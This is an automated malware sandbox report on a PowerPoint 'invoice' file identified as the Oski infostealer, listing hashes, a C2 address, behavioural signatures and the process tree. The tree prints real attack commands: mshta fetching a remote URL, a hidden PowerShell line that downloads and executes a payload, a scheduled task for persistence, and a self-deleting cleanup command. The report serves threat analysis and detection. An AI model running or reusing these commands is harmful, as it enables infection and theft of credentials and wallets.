Resubmissions

13/08/2021, 09:28

210813-fnjyawq6ws 10

13/08/2021, 09:23

210813-swdjcyat5e 10

13/08/2021, 07:05

210813-4dy26bbdfe 10

03/08/2021, 07:47

210803-jrlp4kfgt2 10

Analysis

  • max time kernel
    242s
  • max time network
    210s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    03/08/2021, 07:47

General

  • Target

    InvoiceNo_8041766.ppt

  • Size

    82KB

  • MD5

    c27b99ba1c1e0e88a8362fd5b9193499

  • SHA1

    4aa04165daad8a8827d39067b117c2a81399f87d

  • SHA256

    c9eef29af749ee4e022d0852bfec6b85a382cb50d0dfcab2eeed1a89499fde48

  • SHA512

    8c7c17959905a83b503d5a1892a9950399ae6d1f0b4859a4b2cfaf0c0bb176cebf64d9992b93d5b32d8aca95dff13821303ad5d234109f65de4ac03fdc80a892

Malware Config

Extracted

Family

oski

C2

103.99.1.60/we/2ky/

Signatures

  • Oski

    Oski is an infostealer targeting browser data and cryptocurrency wallets.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Blocklisted process makes network request 19 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\InvoiceNo_8041766.ppt"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2000
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe rubishdata/Rmshta https://www.bitly.com/twyuiqbdhsavbdsabdjsd
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1444
        • C:\Windows\SysWOW64\mshta.exe
          mshta https://www.bitly.com/twyuiqbdhsavbdsabdjsd
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://ia601400.us.archive.org/2/items/2kyfriend/2kyfriend.txt') -useB);
            4⤵
            • Blocklisted process makes network request
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1864
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              #cmd
              5⤵
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious use of WriteProcessMemory
              PID:568
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /pid 568 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe & RD /S /Q C:\\ProgramData\\635786962599557\\* & exit
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1808
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /pid 568
                  7⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:828
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/2kyfriend.html\""
            4⤵
            • Creates scheduled task(s)
            PID:1524

Network

MITRE ATT&CK Enterprise v6


Downloads

  • memory/568-103-0x0000000000400000-0x0000000000438000-memory.dmp (Filesize: 224KB)
  • memory/568-100-0x0000000000400000-0x0000000000438000-memory.dmp (Filesize: 224KB)
  • memory/1032-64-0x0000000075591000-0x0000000075593000-memory.dmp (Filesize: 8KB)
  • memory/1032-60-0x0000000073AE1000-0x0000000073AE5000-memory.dmp (Filesize: 16KB)
  • memory/1032-69-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/1032-62-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/1032-61-0x0000000071191000-0x0000000071193000-memory.dmp (Filesize: 8KB)
  • memory/1864-95-0x00000000062C0000-0x00000000062C1000-memory.dmp (Filesize: 4KB)
  • memory/1864-96-0x000000007EF30000-0x000000007EF31000-memory.dmp (Filesize: 4KB)
  • memory/1864-94-0x0000000006280000-0x0000000006281000-memory.dmp (Filesize: 4KB)
  • memory/1864-87-0x0000000006160000-0x0000000006161000-memory.dmp (Filesize: 4KB)
  • memory/1864-99-0x0000000006270000-0x000000000627C000-memory.dmp (Filesize: 48KB)
  • memory/1864-86-0x00000000056C0000-0x00000000056C1000-memory.dmp (Filesize: 4KB)
  • memory/1864-81-0x0000000005650000-0x0000000005651000-memory.dmp (Filesize: 4KB)
  • memory/1864-78-0x0000000004850000-0x0000000004851000-memory.dmp (Filesize: 4KB)
  • memory/1864-77-0x0000000002580000-0x0000000002581000-memory.dmp (Filesize: 4KB)
  • memory/1864-75-0x00000000048D0000-0x00000000048D1000-memory.dmp (Filesize: 4KB)
  • memory/1864-76-0x00000000048D2000-0x00000000048D3000-memory.dmp (Filesize: 4KB)
  • memory/1864-74-0x0000000004910000-0x0000000004911000-memory.dmp (Filesize: 4KB)
  • memory/1864-73-0x0000000000DE0000-0x0000000000DE1000-memory.dmp (Filesize: 4KB)
  • memory/2000-65-0x000007FEFB991000-0x000007FEFB993000-memory.dmp (Filesize: 8KB)